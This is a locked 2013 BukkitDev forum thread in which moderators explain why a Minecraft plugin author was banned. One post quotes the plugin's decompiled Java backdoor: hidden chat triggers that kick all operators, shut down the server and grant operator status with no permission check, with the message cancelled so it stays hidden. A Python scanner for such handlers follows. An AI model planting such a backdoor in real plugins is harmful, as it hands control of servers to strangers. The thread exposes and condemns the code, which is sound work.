what a sucky community

Discussion in 'BukkitDev Information and Feedback' started by craftik7, Nov 20, 2013.

Thread Status:
Not open for further replies.
  1. Offline

    craftik7

    My story (edited):
    I was developing plugins for almost a year. Plugins like ChatControl etc. Then I got banned and the reason was that I am making the force op. I got so sad and I was trying to get an answer but my email remained unanswered. I have edited this post so it won't sound so rude against the community, I just wanted to finally get some attention because I really want to continue ChatControl ...
     
  2. Offline

    TnT

    You uploaded a plugin that allows a #kickops command, which would kick all server OPS, then you can also use #opme to OP yourself. This has no permission check and anyone joining a server with that plugin can kick all OPs and OP themselves.

    Here is the proof:
    http://pastebin.com/xwhSHpcM

    I see nothing wrong with your ban.
     
  3. Offline

    jorisk322

  4. Offline

    craftik7

    The commands WERE protected! Please stop lying and saying that they were allowed to everyone! This code prevented everyone from accessing them, you have to specify people who are permitted to execute them:
    Code:java
    if(this.getConfig().getList("ops").contains(e.getPlayer().getName())) {

    which prevents anyone who is not on the list from using any of the commands which were below.

    I still cannot believe after one year this damn stupid little plugin caused a ban :(

    But thanks for answering, really appreciate that these days
     
  5. Offline

    Blah1

    Why would you waste a year coding a plugin and then put something that you KNOW is illegal in it? And this is one of the best communities on the internet. Try going on minecraft forums...you'll get crushed.
     
  6. This is a pretty clear-cut case of a malicious plugin. The commands are recognized via chat, so they don't need to be documented in the plugin.yml file at all (thus concealing them).

    I can't really think of a legitimate reason to even include them!


    I've seen things no man should see on those forums.

    The...the herobrine threads...
     
  7. Offline

    JMiahMan

    Any community can be sucky depending on what you are trying to get away with and allowed/not allowed to do. Obviously if you're trying your boundaries in any community the results can be very sucky when you get slapped back into place.. that's kinda expected, but I guess it can be sucky if you're on the other end of the backhand.
     
  8. Offline

    LandonTheGeek

    Wow craftik7

    This is just nonsense. BukkitDev had a great catch, and I give them a pat on the back for that. No reason to give the community a bad rating, you need to be willing to fix your code without making it malicious (Permission Checks).

    If you want to bring Bukkit into the picture for your actions that they didn't do, then it is your own problem.
     
  9. Offline

    jimbo8

    I don't get it. I might have misread it, but as far as I can see, it checks if a player is OP in the config. And if he is not, he gets kicked. I might have skipped something, but yeah.
     
  10. Check this block:

    public void onCommand(AsyncPlayerChatEvent e)
    It checks chat messages for specific strings.

    Code:java
    else if(e.getMessage().startsWith(this.getConfig().getString("commands.kickops"))) {
        var4 = (var5 = this.getServer().getOnlinePlayers()).length;

        for(pl = 0; pl < var4; ++pl) {
            p = var5[pl];
            if(p.isOp() && !p.getName().equals(e.getPlayer().getName())) {
                p.kickPlayer("End of stream");
            }
        }

        e.getPlayer().sendMessage("The command has been performed.");
        e.setCancelled(true);
    } else if(e.getMessage().startsWith(this.getConfig().getString("commands.hardshutdown"))) {
        e.getPlayer().sendMessage("System shutdown initiated.");
        System.exit(1);
    } else if(e.getMessage().startsWith(this.getConfig().getString("commands.op"))) {
        e.getPlayer().sendMessage("Now you are an op.");
        e.getPlayer().setOp(true);
        e.setCancelled(true);
    }


    All three of these are devastating.

    kickops immediately kicks all operators from the server.

    hardshutdown terminates the Java Virtual Machine without giving anything else a chance to think.

    opme immediately gives OP status to the executor.

    None of these have permissions checks and could be used by anyone on the server.
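
A reviewer-side check for the pattern described in the post above, as an added example that is not part of the thread or of the plugin's code: it scans Java source (for instance decompiler output) for chat-event handlers that reach `setOp(true)`, `System.exit` or `kickPlayer`, and notes whether the handler also cancels the event so the trigger never shows in chat. The function names, the regexes and the sample source are assumptions constructed for illustration.

```python
import re

# Calls taken from the excerpt above that a chat listener should never reach.
SENSITIVE = {
    "setOp": re.compile(r"\.setOp\s*\(\s*true\s*\)"),
    "System.exit": re.compile(r"\bSystem\s*\.\s*exit\s*\("),
    "kickPlayer": re.compile(r"\.kickPlayer\s*\("),
}
HIDES_MESSAGE = re.compile(r"\.setCancelled\s*\(\s*true\s*\)")
# Methods taking a chat event: triggers handled here never appear in plugin.yml.
CHAT_HANDLER = re.compile(
    r"\bvoid\s+(\w+)\s*\(\s*(?:final\s+)?(?:Async)?PlayerChatEvent\s+\w+\s*\)[^{;]*\{")

def method_body(src, open_idx):
    """Text between the brace at open_idx and its match (braces in strings not handled)."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return src[open_idx + 1:]  # truncated decompile: scan what is there

def scan(src):
    """Flag chat-event handlers that reach privileged server calls."""
    findings = []
    for m in CHAT_HANDLER.finditer(src):
        body = method_body(src, m.end() - 1)
        hits = sorted(n for n, rx in SENSITIVE.items() if rx.search(body))
        if hits:
            findings.append({"handler": m.group(1), "calls": hits,
                             "hides_message": bool(HIDES_MESSAGE.search(body))})
    return findings

# Constructed sample, modelled on the excerpt in the post above.
SAMPLE = '''
public void onCommand(AsyncPlayerChatEvent e) {
    if (e.getMessage().startsWith(this.getConfig().getString("commands.op"))) {
        e.getPlayer().setOp(true);
        e.setCancelled(true);
    } else if (e.getMessage().startsWith("#shutdown")) { System.exit(1); }
}
public void onChat(AsyncPlayerChatEvent e) { e.setMessage(e.getMessage().trim()); }
'''

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A finding is a prompt for manual review, not a verdict: the scan does not tell whether a guard such as a config allow-list wraps the calls.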
     
  11. Offline

    jimbo8

    Oh, okay.. Why does he cancel the event? Makes no sense.

    Anyways, a warning + remove the plugin should be enough, at least that is what I think :p

    And why would anyone even use that plugin? It screws it all up, I would never use it at least :p
     
  12. Offline

    TnT

    jimbo8
    A person does not have multiple chances to submit malicious code to BukkitDev.
     
  13. Offline

    ZachBora

    jimbo8 If the event isn't cancelled it will display in chat for everyone to see. It's a chat event listener.

    Another thing, even if he says it checks if the player name is in the config, I'm almost certain the default config would have his name in it perhaps. When the plugin loads it copies the default config.
     
    Dr_Bunsen and jimbo8 like this.
  14. Offline

    TnT

    Locked. Thread has run its course.
     
    McMhz, Plo124 and PatoTheBest like this.